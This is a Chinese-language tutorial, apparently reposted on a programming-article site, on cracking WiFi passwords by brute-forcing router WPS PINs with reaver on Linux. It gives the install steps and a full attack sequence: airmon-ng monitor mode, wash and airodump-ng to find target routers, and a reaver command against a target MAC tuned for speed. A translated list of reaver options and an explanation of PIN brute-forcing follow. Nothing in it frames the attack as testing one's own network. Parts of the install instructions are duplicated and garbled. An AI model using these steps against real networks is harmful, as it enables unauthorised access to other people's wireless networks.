欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

在linux下使用reaver破解无线wifi密码的步骤

程序员文章站 2022-07-10 10:11:28
这篇文章主要为大家介绍了在linux下使用reaver破解无线wifi密码的下载安装使用方法,需要的朋友可以参考下... 13-11-20...
需要工具:reaver
原理:穷举pin码以攻破无线路由器的安全防护
安装:
 下载源码
从这个网址下载reaver源代码http://code.google.com/p/reaver-wps
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
 
 
解压
tar-xzvf reaver-1.4.tar.gz
 
安装必要的软件依赖库和工具
在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ng
sudo  apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
 
编译和安装
 
配置和编译reaver
 
cd  reaver-1.4
cd  src
./configure
make
下载aircrack-ng源代码并编译
从ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。如果aircrack-ng已经存在,则不必安装。./configure
make
sudo install
解压 tar -xzvf reaver-1.4.tar.gz
 
安装必要的软件依赖库和工具

在您编译 reaver前需要先安装 pcaplib等工具,后面还需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

编译和安装

配置和编译 reaver
cd reaver-1.4 cd src ./configure make
安装 reaver
sudo make install

方法:

1 输入:airmon-ng start wlan0 开启监听模式 (屏幕显示 加载8187l驱动成功–一次就加载成功啊!)
2 输入:wash -i mon0 -c 查看所有开启wps的无线路由 长时间无反应按ctrl+c,结束进程,这时记下你要pj的目标路由mac.
3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有ap的信息(包括 ap的信号强度,essid,mac,频道,加密方式,等等…..),按ctrl+c,结束扫描.
注:如果你已知对方无线路由信息 第2,第3步 可省略!
4 输入:reaver -i mon0 -b mac -a -s -vv 开始穷举pin码
注:随时可以按ctrl+c退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。
实战我输入了reaver -i mon0 -b macd8:5d:4c:37:78:f6 -a -s -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!

reaver 参数详解

必须参数

-i, –interface=<wlan> name of the monitor-mode interface to use
网卡的监视接口,通常是mon0
-b, –bssid=<mac> bssid of the target ap
ap的mac地址
optional arguments: 可选参数
-m, –mac=<mac> mac of the host system
指定本机mac地址
-e, –essid=<ssid> essid of the target ap
路由器的essid,一般不用指定
-c, –channel=<channel> set the 802.11 channel for the interface (implies -f)
信号的频道,如果不指定会自动扫描
-o, –out-file=<file> send output to a log file [stdout]
输出日志文件
-s, –session=<file> restore a previous session file
恢复进度文件
-c, –exec=<command> execute the supplied command upon successful pin recovery
pin成功后执行命令
-d, –daemonize daemonize reaver
设置reaver成daemon
-a, –auto auto detect the best advanced options for the target ap
对目标ap自动检测高级参数
-f, –fixed disable channel hopping
禁止频道跳转
-5, –5ghz use 5ghz 802.11 channels
使用5g频道
-v, –verbose display non-critical warnings (-vv for more)
显示不重要警告信息 -vv 可以显示更多
-q, –quiet only display critical messages
只显示关键信息
-h, –help show help
显示帮助
advanced options:高级选项
-p, –pin=<wps pin> use the specified 4 or 8 digit wps pin
使用指定的4位或者8位pin码
-d, –delay=<seconds> set the delay between pin attempts [1]
pin间延时,默认1秒
-l, –lock-delay=<seconds> set the time to wait if the ap locks wps pin attempts [60]
ap锁定wps后等待时间
-g, –max-attempts=<num> quit after num pin attempts
最大pin次数
reaver 参数
—天天
-x, –fail-wait=<seconds> set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认0秒
-r, –recurring-delay=<x:y> sleep for y seconds every x pin attempts
每x次pin后等待y秒
-t, –timeout=<seconds> set the receive timeout period [5]
收包超时,默认5秒
-t, –m57-timeout=<seconds> set the m5/m7 timeout period [0.20]
m5/m7超时,默认0.2秒
-a, –no-associate do not associate with the ap (association must be done by another application)
 
不连入ap(连入过程必须有其他程序完成)
-n, –no-nacks do not send nack messages when out of order packets are received
不发送nack信息(如果一直pin不动,可以尝试这个参数)
-s, –dh-small use small dh keys to improve crack speed
使用小dh关键值提高速度(推荐使用)
-l, –ignore-locks ignore locked state reported by the target ap
忽略目标ap报告的锁定状态
-e, –eap-terminate terminate each wps session with an eap fail packet
每当收到eap失败包就终止wps进程
-n, –nack target ap always sends a nack [auto]
对目标ap总是发送nack,默认自动
-w, –win7 mimic a windows 7 registrar [false]
模拟win7注册,默认关闭
ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。
原理详细:
什么是pin码?
印在无线路由器设备标签上的一组8位数字字符串,无线路由器管理界面中当然也会存在并可更改。
pin码有什么用?
在无线网卡的配套管理软件(如tp-link的qss软件)里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。
穷举pin码是什么意思?
既然知道了无线路由器pin值的范围(8位纯数字),且目前大部分设备的wps是呈开启状态的,那么穷举pin码以攻破无线路由器的安全防护这一暴力行为就有了*理论*可行性
相关标签: reaver 无线WIFI